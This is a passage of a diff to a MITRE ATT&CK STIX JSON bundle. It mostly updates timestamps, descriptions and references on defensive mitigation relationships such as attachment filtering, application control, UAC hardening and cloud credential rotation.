"relationship--bfa95fdc-6f4f-48a9-a155-189c81dc9ebd", "type": "relationship", - "modified": "2020-03-27T23:56:40.509Z", + "modified": "2020-10-18T01:52:25.459Z", "created": "2020-03-02T19:05:18.242Z" }, { @@ -166206,7 +171409,7 @@ "description": "Block unknown or unused attachments by default that should not be transmitted over email as a best practice to prevent some vectors, such as .scr, .exe, .pif, .cpl, etc. Some email scanning devices can open and analyze compressed and encrypted formats, such as zip and rar that may be used to conceal malicious attachments.", "id": "relationship--f2f68eb7-4110-4750-9d1c-58774036672b", "type": "relationship", - "modified": "2020-03-27T23:56:40.525Z", + "modified": "2020-10-18T01:52:25.480Z", "created": "2020-03-02T19:05:18.264Z" }, { @@ -166220,7 +171423,7 @@ "description": "Anti-virus can also automatically quarantine suspicious files.", "id": "relationship--26d24472-ae04-46e7-9166-5d8a8f6f16f7", "type": "relationship", - "modified": "2020-03-27T23:56:40.529Z", + "modified": "2020-10-18T01:52:25.491Z", "created": "2020-03-02T19:05:18.267Z" }, { @@ -166234,7 +171437,7 @@ "description": "Network intrusion prevention systems and systems designed to scan and remove malicious email attachments can be used to block activity.", "id": "relationship--7a75d200-29f5-4f8a-b052-bcbe4e5ca236", "type": "relationship", - "modified": "2020-03-27T23:56:40.527Z", + "modified": "2020-10-18T01:52:25.511Z", "created": "2020-03-02T19:05:18.271Z" }, { @@ -166287,7 +171490,7 @@ "description": "Users can be trained to identify social engineering techniques and spearphishing emails with malicious links.", "id": "relationship--d4f9d2ab-70d0-4aaf-9c7f-d94fc0818ecb", "type": "relationship", - "modified": "2020-03-02T19:44:47.982Z", + "modified": "2020-10-18T01:53:40.032Z", "created": "2020-03-02T19:18:20.208Z" }, { @@ -166301,7 +171504,7 @@ "description": "Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.", "id": "relationship--239092bc-09e4-4c16-9d83-071929c9e4a4", "type": "relationship", - "modified": "2020-03-02T19:44:47.985Z", + "modified": "2020-10-18T01:53:40.068Z", "created": "2020-03-02T19:18:20.216Z" }, { @@ -166341,7 +171544,7 @@ "description": "Users can be trained to identify social engineering techniques and spearphishing messages with malicious links.", "id": "relationship--11643b79-aef3-4322-ab3c-06f6569a1583", "type": "relationship", - "modified": "2020-03-28T00:04:46.391Z", + "modified": "2020-10-18T01:55:03.166Z", "created": "2020-03-02T19:28:55.578Z" }, { @@ -166355,7 +171558,7 @@ "description": "Determine if certain social media sites, personal webmail services, or other service that can be used for spearphishing is necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.", "id": "relationship--7f18d24e-fffe-413f-96ff-612b3e9bedd6", "type": "relationship", - "modified": "2020-03-28T00:04:46.393Z", + "modified": "2020-10-18T01:55:03.207Z", "created": "2020-03-02T19:28:55.581Z" }, { @@ -166369,7 +171572,7 @@ "description": "Anti-virus can also automatically quarantine suspicious files.", "id": "relationship--6c1c0c1e-91fb-4285-9656-8d452e630fb3", "type": "relationship", - "modified": "2020-03-28T00:04:46.410Z", + "modified": "2020-10-18T01:55:03.240Z", "created": "2020-03-02T19:28:55.583Z" }, { @@ -166423,23 +171626,13 @@ "id": "relationship--92f524c5-86e8-43cf-90d5-907ac16acf5d", "external_references": [ { - "source_name": "CERT-EU DDoS March 2017", + "description": "Meintanis, S., Revuelto, V., Socha, K.. (2017, March 10). DDoS Overview and Response Guide. Retrieved April 24, 2019.", "url": "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf", - "description": "Meintanis, S., Revuelto, V., Socha, K.. (2017, March 10). DDoS Overview and Response Guide. Retrieved April 24, 2019." - }, - { - "source_name": "CERT-EU DDoS March 2017", - "url": "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf", - "description": "Meintanis, S., Revuelto, V., Socha, K.. (2017, March 10). DDoS Overview and Response Guide. Retrieved April 24, 2019." - }, - { - "source_name": "CERT-EU DDoS March 2017", - "url": "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf", - "description": "Meintanis, S., Revuelto, V., Socha, K.. (2017, March 10). DDoS Overview and Response Guide. Retrieved April 24, 2019." + "source_name": "CERT-EU DDoS March 2017" } ], "type": "relationship", - "modified": "2020-06-01T13:16:33.127Z", + "modified": "2020-09-16T15:57:12.587Z", "created": "2020-03-02T20:36:52.656Z" }, { @@ -166454,23 +171647,13 @@ "id": "relationship--2f47b6cb-a378-492d-9565-e9ebbca68908", "external_references": [ { - "source_name": "CERT-EU DDoS March 2017", + "description": "Meintanis, S., Revuelto, V., Socha, K.. (2017, March 10). DDoS Overview and Response Guide. Retrieved April 24, 2019.", "url": "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf", - "description": "Meintanis, S., Revuelto, V., Socha, K.. (2017, March 10). DDoS Overview and Response Guide. Retrieved April 24, 2019." - }, - { - "source_name": "CERT-EU DDoS March 2017", - "url": "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf", - "description": "Meintanis, S., Revuelto, V., Socha, K.. (2017, March 10). DDoS Overview and Response Guide. Retrieved April 24, 2019." - }, - { - "source_name": "CERT-EU DDoS March 2017", - "url": "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf", - "description": "Meintanis, S., Revuelto, V., Socha, K.. (2017, March 10). DDoS Overview and Response Guide. Retrieved April 24, 2019." + "source_name": "CERT-EU DDoS March 2017" } ], "type": "relationship", - "modified": "2020-06-01T13:16:33.146Z", + "modified": "2020-09-16T15:58:18.700Z", "created": "2020-03-02T21:04:24.530Z" }, { @@ -166872,7 +172055,7 @@ "description": "Where possible, only permit execution of signed scripts.", "id": "relationship--2cf7243f-d5d7-473b-9cb7-27c7186565d3", "type": "relationship", - "modified": "2020-06-25T03:19:34.259Z", + "modified": "2020-10-21T16:09:10.713Z", "created": "2020-03-09T13:41:14.474Z" }, { @@ -166893,7 +172076,7 @@ } ], "type": "relationship", - "modified": "2020-06-25T03:19:34.303Z", + "modified": "2020-10-21T16:09:10.797Z", "created": "2020-03-09T13:41:14.487Z" }, { @@ -166907,7 +172090,7 @@ "description": "Disable or remove any unnecessary or unused shells or interpreters.", "id": "relationship--6abc6901-d152-4b5f-b27d-8b973ae567cb", "type": "relationship", - "modified": "2020-06-25T03:19:34.300Z", + "modified": "2020-10-21T16:09:10.799Z", "created": "2020-03-09T13:41:14.499Z" }, { @@ -166996,7 +172179,7 @@ "description": "Use application control where appropriate.", "id": "relationship--809f6537-c7f8-4d96-ba16-5bffa897b52f", "type": "relationship", - "modified": "2020-06-20T20:11:42.524Z", + "modified": "2020-08-03T21:40:52.110Z", "created": "2020-03-09T14:07:54.876Z" }, { @@ -167017,7 +172200,7 @@ } ], "type": "relationship", - "modified": "2020-04-14T13:28:17.854Z", + "modified": "2020-08-03T21:40:52.134Z", "created": "2020-03-09T14:07:54.886Z" }, { @@ -167111,7 +172294,7 @@ "description": "Use application control where appropriate.", "id": "relationship--1a69dce6-b39e-4cd2-a29a-18e42293c51a", "type": "relationship", - "modified": "2020-06-25T03:32:51.271Z", + "modified": "2020-08-13T20:09:39.451Z", "created": "2020-03-09T14:29:52.125Z" }, { @@ -167125,7 +172308,7 @@ "description": "Turn off or restrict access to unneeded VB components.", "id": "relationship--0f27ea83-21e7-4a9f-9c66-85fe85da5135", "type": "relationship", - "modified": "2020-06-25T03:32:51.262Z", + "modified": "2020-08-13T20:09:39.436Z", "created": "2020-03-09T14:29:52.132Z" }, { @@ -167261,7 +172444,7 @@ "description": "Disable legacy network protocols that may be used for MiTM if applicable and they are not needed within an environment.", "id": "relationship--3e3c926e-4f21-40f0-b869-6b3c0e35e243", "type": "relationship", - "modified": "2020-03-28T01:40:23.094Z", + "modified": "2020-10-16T15:14:23.670Z", "created": "2020-03-09T15:42:45.500Z" }, { @@ -167275,7 +172458,7 @@ "description": "Use network appliances and host-based security software to block network traffic that is not necessary within the environment, such as legacy protocols that may be leveraged for MiTM.", "id": "relationship--029a477b-fa90-4941-a577-1af6900d1b56", "type": "relationship", - "modified": "2020-03-28T01:40:23.097Z", + "modified": "2020-10-16T15:14:23.703Z", "created": "2020-03-09T15:42:45.503Z" }, { @@ -167330,7 +172513,7 @@ "description": "In some cases a local DNS sinkhole may be used to help prevent DGA-based command and control at a reduced cost.", "id": "relationship--909147b8-d0f8-4222-b62c-10f1d8bec2ec", "type": "relationship", - "modified": "2020-03-12T14:45:22.923Z", + "modified": "2020-10-02T01:37:39.862Z", "created": "2020-03-10T17:45:00.272Z" }, { @@ -167361,7 +172544,7 @@ } ], "type": "relationship", - "modified": "2020-03-12T14:45:22.970Z", + "modified": "2020-10-02T01:37:39.855Z", "created": "2020-03-10T17:45:00.294Z" }, { @@ -167392,7 +172575,7 @@ } ], "type": "relationship", - "modified": "2020-03-12T14:45:23.020Z", + "modified": "2020-10-02T01:37:39.886Z", "created": "2020-03-10T17:45:00.302Z" }, { @@ -168252,7 +173435,7 @@ ], "description": "Use auditing tools capable of detecting file system permissions abuse opportunities on systems within an enterprise and correct them. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for service file system permissions weaknesses.(Citation: Powersploit)", "type": "relationship", - "modified": "2020-03-26T19:37:29.038Z", + "modified": "2020-09-16T19:10:04.377Z", "created": "2020-03-12T20:43:54.091Z" }, { @@ -168279,7 +173462,7 @@ "id": "relationship--112eb215-e03d-4c15-8e8d-3d1b5e1096c9", "description": "Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service binary target path locations. Deny execution from user directories such as file download directories and temp directories where able.", "type": "relationship", - "modified": "2020-03-26T19:37:29.034Z", + "modified": "2020-09-16T19:10:04.394Z", "created": "2020-03-12T21:00:53.803Z" }, { @@ -168300,7 +173483,7 @@ ], "description": "Turn off UAC's privilege elevation for standard users [HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System]to automatically deny elevation requests, add: \"ConsentPromptBehaviorUser\"=dword:00000000. Consider enabling installer detection for all users by adding: \"EnableInstallerDetection\"=dword:00000001. This will prompt for a password for installation and also log the attempt. To disable installer detection, instead add: \"EnableInstallerDetection\"=dword:00000000. This may prevent potential elevation of privileges through exploitation during the process of UAC detecting the installer, but will allow the installation process to continue without being logged.(Citation: Executable Installers are Vulnerable)", "type": "relationship", - "modified": "2020-03-26T19:37:29.061Z", + "modified": "2020-09-16T19:10:04.418Z", "created": "2020-03-12T21:00:53.808Z" }, { @@ -168383,7 +173566,7 @@ "id": "relationship--469231fb-3797-49bf-9f23-078b37a35671", "description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation. ", "type": "relationship", - "modified": "2020-06-20T22:01:10.078Z", + "modified": "2020-09-16T19:07:48.828Z", "created": "2020-03-13T11:42:14.585Z" }, { @@ -168410,7 +173593,7 @@ "id": "relationship--ca04cce0-2f47-4c73-956f-808573b62903", "description": "Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory C: and system directories, such as C:\\Windows\\, to reduce places where malicious files could be placed for execution. Require that all executables be placed in write-protected directories.", "type": "relationship", - "modified": "2020-05-20T15:12:39.573Z", + "modified": "2020-09-17T19:05:23.996Z", "created": "2020-03-13T13:51:58.682Z" }, { @@ -168441,7 +173624,7 @@ ], "description": "Find and eliminate path interception weaknesses in program configuration files, scripts, the PATH environment variable, services, and in shortcuts by surrounding PATH variables with quotation marks when functions allow for them. Be aware of the search order Windows uses for executing or loading binaries and use fully qualified paths wherever appropriate.\n\nClean up old Windows Registry keys when software is uninstalled to avoid keys with no associated legitimate binaries. Periodically search for and correct or report path interception weaknesses on systems that may have been introduced using custom or available tools that report software using insecure path configurations.(Citation: Microsoft CreateProcess)(Citation: Microsoft Dynamic-Link Library Security)(Citation: Vulnerability and Exploit Detector)", "type": "relationship", - "modified": "2020-03-26T19:55:40.149Z", + "modified": "2020-09-17T19:05:23.998Z", "created": "2020-03-13T13:51:58.698Z" }, { @@ -168487,7 +173670,7 @@ ], "description": "Adversaries will likely need to place new binaries in locations to be executed through this weakness. Identify and block potentially malicious software executed path interception by using application control tools, like Windows Defender Application Control, AppLocker, or Software Restriction Policies where appropriate.(Citation: SANS Application Whitelisting)(Citation: Microsoft Windows Defender Application Control)(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker)(Citation: Microsoft Application Lockdown)(Citation: Microsoft Using Software Restriction )", "type": "relationship", - "modified": "2020-06-20T20:11:42.903Z", + "modified": "2020-09-17T19:05:24.032Z", "created": "2020-03-13T13:51:58.701Z" }, { @@ -168514,7 +173697,7 @@ "id": "relationship--5a70a968-618c-489e-8087-eabca740aa3a", "description": "Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory C: and system directories, such as C:\\Windows\\, to reduce places where malicious files could be placed for execution. Require that all executables be placed in write-protected directories.", "type": "relationship", - "modified": "2020-06-20T22:02:41.210Z", + "modified": "2020-09-16T16:56:34.867Z", "created": "2020-03-13T14:10:43.564Z" }, { @@ -168560,7 +173743,7 @@ ], "description": "Adversaries will likely need to place new binaries in locations to be executed through this weakness. Identify and block potentially malicious software executed path interception by using application control tools, like Windows Defender Application Control, AppLocker, or Software Restriction Policies where appropriate.(Citation: SANS Application Whitelisting)(Citation: Microsoft Windows Defender Application Control)(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker)(Citation: Microsoft Application Lockdown)(Citation: Microsoft Using Software Restriction )", "type": "relationship", - "modified": "2020-06-20T22:02:41.224Z", + "modified": "2020-09-16T16:56:34.889Z", "created": "2020-03-13T14:10:43.585Z" }, { @@ -168591,7 +173774,7 @@ ], "description": "Find and eliminate path interception weaknesses in program configuration files, scripts, the PATH environment variable, services, and in shortcuts by surrounding PATH variables with quotation marks when functions allow for them. Be aware of the search order Windows uses for executing or loading binaries and use fully qualified paths wherever appropriate.\n\nClean up old Windows Registry keys when software is uninstalled to avoid keys with no associated legitimate binaries. Periodically search for and correct or report path interception weaknesses on systems that may have been introduced using custom or available tools that report software using insecure path configurations.(Citation: Microsoft CreateProcess)(Citation: Microsoft Dynamic-Link Library Security)(Citation: Vulnerability and Exploit Detector)", "type": "relationship", - "modified": "2020-06-20T22:02:41.227Z", + "modified": "2020-09-16T16:56:34.926Z", "created": "2020-03-13T14:10:43.598Z" }, { @@ -168618,7 +173801,7 @@ "id": "relationship--6a3e8d7c-fdb3-4249-9f4e-7825e253bbfd", "description": "Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory C: and system directories, such as C:\\Windows\\, to reduce places where malicious files could be placed for execution. Require that all executables be placed in write-protected directories.", "type": "relationship", - "modified": "2020-05-20T15:12:39.563Z", + "modified": "2020-09-17T19:03:35.379Z", "created": "2020-03-13T17:48:59.195Z" }, { @@ -168664,7 +173847,7 @@ ], "description": "Adversaries will likely need to place new binaries in locations to be executed through this weakness. Identify and block potentially malicious software executed path interception by using application control tools, like Windows Defender Application Control, AppLocker, or Software Restriction Policies where appropriate.(Citation: SANS Application Whitelisting)(Citation: Microsoft Windows Defender Application Control)(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker)(Citation: Microsoft Application Lockdown)(Citation: Microsoft Using Software Restriction )", "type": "relationship", - "modified": "2020-06-20T20:11:42.907Z", + "modified": "2020-09-17T19:03:35.422Z", "created": "2020-03-13T17:48:59.197Z" }, { @@ -168695,7 +173878,7 @@ ], "description": "Find and eliminate path interception weaknesses in program configuration files, scripts, the PATH environment variable, services, and in shortcuts by surrounding PATH variables with quotation marks when functions allow for them. Be aware of the search order Windows uses for executing or loading binaries and use fully qualified paths wherever appropriate.\n\nClean up old Windows Registry keys when software is uninstalled to avoid keys with no associated legitimate binaries. Periodically search for and correct or report path interception weaknesses on systems that may have been introduced using custom or available tools that report software using insecure path configurations.(Citation: Microsoft CreateProcess)(Citation: Microsoft Dynamic-Link Library Security)(Citation: Vulnerability and Exploit Detector)", "type": "relationship", - "modified": "2020-03-26T20:03:27.729Z", + "modified": "2020-09-17T19:03:35.448Z", "created": "2020-03-13T17:48:59.223Z" }, { @@ -168796,7 +173979,7 @@ "id": "relationship--1c47aa23-d267-49f3-9faf-c45b6de0ad6e", "description": "Update software regularly to include patches that fix DLL side-loading vulnerabilities.", "type": "relationship", - "modified": "2020-06-20T22:05:42.679Z", + "modified": "2020-10-17T15:15:28.002Z", "created": "2020-03-13T19:41:37.989Z" }, { @@ -168810,7 +173993,7 @@ "id": "relationship--0eacc0c1-d7f7-42f6-b8c6-288f0b2f605e", "description": "Install software in write-protected locations.", "type": "relationship", - "modified": "2020-06-20T22:05:42.674Z", + "modified": "2020-10-17T15:15:28.019Z", "created": "2020-03-13T19:41:38.007Z" }, { @@ -168824,7 +174007,7 @@ "id": "relationship--4bcf6ed0-7650-4433-8293-19377bc60e24", "description": "Use the program sxstrace.exe that is included with Windows along with manual inspection to check manifest files for side-loading vulnerabilities in software.", "type": "relationship", - "modified": "2020-06-20T22:05:42.693Z", + "modified": "2020-10-17T15:15:28.074Z", "created": "2020-03-13T19:41:38.009Z" }, { @@ -168946,7 +174129,7 @@ "description": "Integrating multi-factor authentication (MFA) as part of organizational policy can greatly reduce the risk of an adversary gaining control of valid credentials that may be used for additional tactics such as initial access, lateral movement, and collecting information. MFA can also be used to restrict access to cloud resources and APIs.", "id": "relationship--45912a00-141c-45ec-afb6-2ac272764c14", "type": "relationship", - "modified": "2020-03-23T21:08:40.235Z", + "modified": "2020-09-16T19:42:11.980Z", "created": "2020-03-13T20:21:54.880Z" }, { @@ -168960,7 +174143,7 @@ "description": "Audit domain account permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account. Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled and use of accounts is segmented, as this is often equivalent to having a local administrator account with the same password on all systems. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. Limit credential overlap across systems to prevent access if account credentials are obtained.", "id": "relationship--4cdd118b-5ad8-4607-94b2-be828038b5ff", "type": "relationship", - "modified": "2020-03-23T21:08:40.249Z", + "modified": "2020-09-16T19:42:11.981Z", "created": "2020-03-13T20:21:54.889Z" }, { @@ -169103,10 +174286,17 @@ "source_ref": "course-of-action--90c218c3-fbf8-4830-98a7-e8cfb7eaa485", "target_ref": "attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65", "relationship_type": "mitigates", - "description": "Ensure that privileged cloud accounts have complex, unique passwords across all systems on the network.", + "description": "Ensure that cloud accounts, particularly privileged accounts, have complex, unique passwords across all systems on the network. Passwords and access keys should be rotated regularly. This limits the amount of time credentials can be used to access resources if a credential is compromised without your knowledge. Cloud service providers may track access key age to help audit and identify keys that may need to be rotated.(Citation: AWS - IAM Console Best Practices)", "id": "relationship--124e7a8b-5bc6-499d-8ca5-4c25b3ed8602", + "external_references": [ + { + "source_name": "AWS - IAM Console Best Practices", + "url": "https://aws.amazon.com/blogs/security/newly-updated-features-in-the-aws-iam-console-help-you-adhere-to-iam-best-practices/", + "description": "Moncur, Rob. (2020, July 5). New Information in the AWS IAM Console Helps You Follow IAM Best Practices. Retrieved August 4, 2020." + } + ], "type": "relationship", - "modified": "2020-03-23T21:59:36.906Z", + "modified": "2020-10-19T16:01:22.244Z", "created": "2020-03-13T20:36:57.496Z" }, { @@ -169117,7 +174307,7 @@ "source_ref": "course-of-action--9bb9e696-bff8-4ae1-9454-961fc7d91d5f", "target_ref": "attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65", "relationship_type": "mitigates", - "description": "Audit cloud accounts permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account. (Citation: TechNet Credential Theft) (Citation: TechNet Least Privilege) These audits should check if new cloud accounts are created that have not be authorized.", + "description": "Review privileged cloud account permission levels routinely to look for those that could allow an adversary to gain wide access.(Citation: TechNet Credential Theft)(Citation: TechNet Least Privilege) These reviews should also check if new privileged cloud accounts have been created that were not authorized.", "id": "relationship--4dbb52bd-9ecf-4c61-91b2-9787860f737c", "external_references": [ { @@ -169132,7 +174322,7 @@ } ], "type": "relationship", - "modified": "2020-03-23T21:59:36.909Z", + "modified": "2020-10-19T16:01:22.263Z", "created": "2020-03-13T20:36:57.502Z" }, { @@ -169166,7 +174356,7 @@ } ], "type": "relationship", - "modified": "2020-03-23T21:37:34.725Z", + "modified": "2020-09-16T19:41:43.623Z", "created": "2020-03-13T20:44:06.873Z" }, { @@ -169490,7 +174680,7 @@ "description": "Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network allow and block lists. It should be noted that this kind of blocking may be circumvented by other techniques like [Domain Fronting](https://attack.mitre.org/techniques/T1090/004).", "id": "relationship--a424a85c-a3c6-4d84-85f7-e55c8dbe21fc", "type": "relationship", - "modified": "2020-06-20T20:46:36.698Z", + "modified": "2020-10-21T02:18:23.386Z", "created": "2020-03-14T23:19:38.118Z" }, { @@ -169504,7 +174694,7 @@ "description": "If it is possible to inspect HTTPS traffic, the captures can be analyzed for connections that appear to be domain fronting.", "id": "relationship--f229e2fb-3105-4ae5-abe1-d100209f702c", "type": "relationship", - "modified": "2020-03-14T23:19:38.129Z", + "modified": "2020-10-21T02:18:23.416Z", "created": "2020-03-14T23:19:38.129Z" }, { @@ -169518,7 +174708,7 @@ "description": "Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network allow and block lists. It should be noted that this kind of blocking may be circumvented by other techniques like [Domain Fronting](https://attack.mitre.org/techniques/T1090/004).", "id": "relationship--4735a1be-c556-4844-9554-d2313376f09a", "type": "relationship", - "modified": "2020-06-20T20:46:36.683Z", + "modified": "2020-10-21T17:54:28.384Z", "created": "2020-03-14T23:23:41.913Z" }, { @@ -169558,7 +174748,7 @@ "description": "If it is possible to inspect HTTPS traffic, the captures can be analyzed for connections that appear to be domain fronting.", "id": "relationship--2d63a9e6-9be2-44ea-8276-89ae92049509", "type": "relationship", - "modified": "2020-06-20T20:53:20.509Z", + "modified": "2020-09-16T19:30:54.308Z", "created": "2020-03-14T23:29:19.751Z" }, { @@ -170001,7 +175191,7 @@ "description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. ", "id": "relationship--bd072d13-3815-46eb-ae84-1aba38db3fab", "type": "relationship", - "modified": "2020-03-26T20:26:46.540Z", + "modified": "2020-08-21T14:41:23.121Z", "created": "2020-03-15T16:16:25.874Z" }, { @@ -170028,7 +175218,7 @@ "description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. ", "id": "relationship--78b31fa7-10ef-4c28-888e-71da978e9e81", "type": "relationship", - "modified": "2020-03-26T20:28:01.106Z", + "modified": "2020-10-21T16:35:45.749Z", "created": "2020-03-15T16:21:45.233Z" }, { @@ -170055,7 +175245,7 @@ "description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. ", "id": "relationship--c9f53392-065d-4573-a08a-37bc3d24d3e5", "type": "relationship", - "modified": "2020-03-27T19:02:44.753Z", + "modified": "2020-10-21T16:26:35.297Z", "created": "2020-03-15T16:27:38.218Z" }, { @@ -170069,7 +175259,7 @@ "description": "Consider filtering DNS requests to unknown, untrusted, or known bad domains and resources. Resolving DNS requests with on-premise/proxy servers may also disrupt adversary attempts to conceal data within DNS packets. ", "id": "relationship--444dc2e9-3f54-4ab9-b004-363ae1221373", "type": "relationship", - "modified": "2020-03-27T19:02:44.755Z", + "modified": "2020-10-21T16:26:35.294Z", "created": "2020-03-15T16:27:38.221Z" }, { @@ -170116,7 +175306,7 @@ } ], "type": "relationship", - "modified": "2020-06-26T12:42:08.050Z", + "modified": "2020-10-21T02:35:44.372Z", "created": "2020-03-16T14:49:02.682Z" }, { @@ -170147,7 +175337,7 @@ } ], "type": "relationship", - "modified": "2020-06-26T12:42:08.076Z", + "modified": "2020-10-21T02:35:44.393Z", "created": "2020-03-16T14:49:02.706Z" }, { @@ -170161,7 +175351,7 @@ "description": "Integrating multi-factor authentication (MFA) as part of organizational policy can greatly reduce the risk of an adversary gaining control of valid credentials that may be used for additional tactics such as initial access, lateral movement, and collecting information. MFA can also be used to restrict access to cloud resources and APIs. ", "id": "relationship--2686dfb7-60ab-424c-add2-2f164a98cfa4", "type": "relationship", - "modified": "2020-06-26T12:42:08.079Z", + "modified": "2020-10-21T02:35:44.420Z", "created": "2020-03-16T14:49:02.709Z" }, { @@ -170175,7 +175365,7 @@ "description": "Ensure only valid password filters are registered. Filter DLLs must be present in Windows installation directory (C:\\Windows\\System32\\ by default) of a domain controller and/or local computer with a corresponding entry in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages. ", "id": "relationship--fc8ef14d-1a07-4f96-85c3-b62ba6bcffc1", "type": "relationship", - "modified": "2020-06-26T12:42:08.074Z", + "modified": "2020-10-21T02:35:44.439Z", "created": "2020-03-16T14:49:02.714Z" }, { @@ -170189,7 +175379,7 @@ "description": "Integrating multi-factor authentication (MFA) as part of organizational policy can greatly reduce the risk of an adversary gaining control of valid credentials that may be used for additional tactics such as initial access, lateral movement, and collecting information. MFA can also be used to restrict access to cloud resources and APIs. ", "id": "relationship--acd4512e-3ef7-4c33-9fc1-c3829efebe60", "type": "relationship", - "modified": "2020-03-25T20:51:30.935Z", + "modified": "2020-08-26T14:16:48.292Z", "created": "2020-03-16T14:56:19.332Z" }, { @@ -170220,7 +175410,7 @@ } ], "type": "relationship", - "modified": "2020-03-25T20:51:30.951Z", + "modified": "2020-08-26T14:16:48.311Z", "created": "2020-03-16T14:56:19.347Z" }, { @@ -170241,7 +175431,7 @@ } ], "type": "relationship", - "modified": "2020-03-25T20:51:30.955Z", + "modified": "2020-08-26T14:16:48.337Z", "created": "2020-03-16T14:56:19.362Z" }, { @@ -170311,7 +175501,7 @@ "id": "relationship--36f7b849-03af-4567-be71-2e1eb1520b2a", "description": "Set directory access controls to prevent file writes to the search paths for applications, both in the folders where applications are run from and the standard dylib folders.", "type": "relationship", - "modified": "2020-06-20T22:06:47.264Z", + "modified": "2020-09-16T16:48:09.599Z", "created": "2020-03-16T15:23:31.062Z" }, { @@ -170467,7 +175657,7 @@ "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "target_ref": "attack-pattern--8cdeb020-e31e-4f88-a582-f53dcfbda819", "external_references": [ { @@ -170530,7 +175720,7 @@ "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "target_ref": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", "external_references": [ { @@ -170843,7 +176033,7 @@ "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "target_ref": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", "external_references": [ { @@ -170864,7 +176054,7 @@ "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "target_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", "external_references": [ { @@ -170885,7 +176075,7 @@ "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", "external_references": [ { @@ -171607,13 +176797,18 @@ "description": "Lee, S.. (2019, April 24). Emotet Using WMI to Launch PowerShell Encoded Code. Retrieved May 24, 2019.", "url": "https://www.carbonblack.com/2019/04/24/cb-tau-threat-intelligence-notification-emotet-utilizing-wmi-to-launch-powershell-encoded-code/", "source_name": "Carbon Black Emotet Apr 2019" + }, + { + "source_name": "IBM IcedID November 2017", + "url": "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", + "description": "Kessem, L., et al. (2017, November 13). New Banking Trojan IcedID Discovered by IBM X-Force Research. Retrieved July 14, 2020." } ], - "description": "[Emotet](https://attack.mitre.org/software/S0367) has relied upon users clicking on a malicious attachment delivered through spearphishing.(Citation: Trend Micro Banking Malware Jan 2019)(Citation: Carbon Black Emotet Apr 2019)", + "description": "[Emotet](https://attack.mitre.org/software/S0367) has relied upon users clicking on a malicious attachment delivered through spearphishing.(Citation: Trend Micro Banking Malware Jan 2019)(Citation: Carbon Black Emotet Apr 2019)(Citation: IBM IcedID November 2017)", "relationship_type": "uses", "id": "relationship--219dcd0b-a6fe-47d4-99b9-24d945b1f168", "type": "relationship", - "modified": "2020-07-15T13:03:46.808Z", + "modified": "2020-07-15T18:05:15.629Z", "created": "2020-03-17T13:31:00.273Z" }, { @@ -172290,7 +177485,7 @@ "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "target_ref": 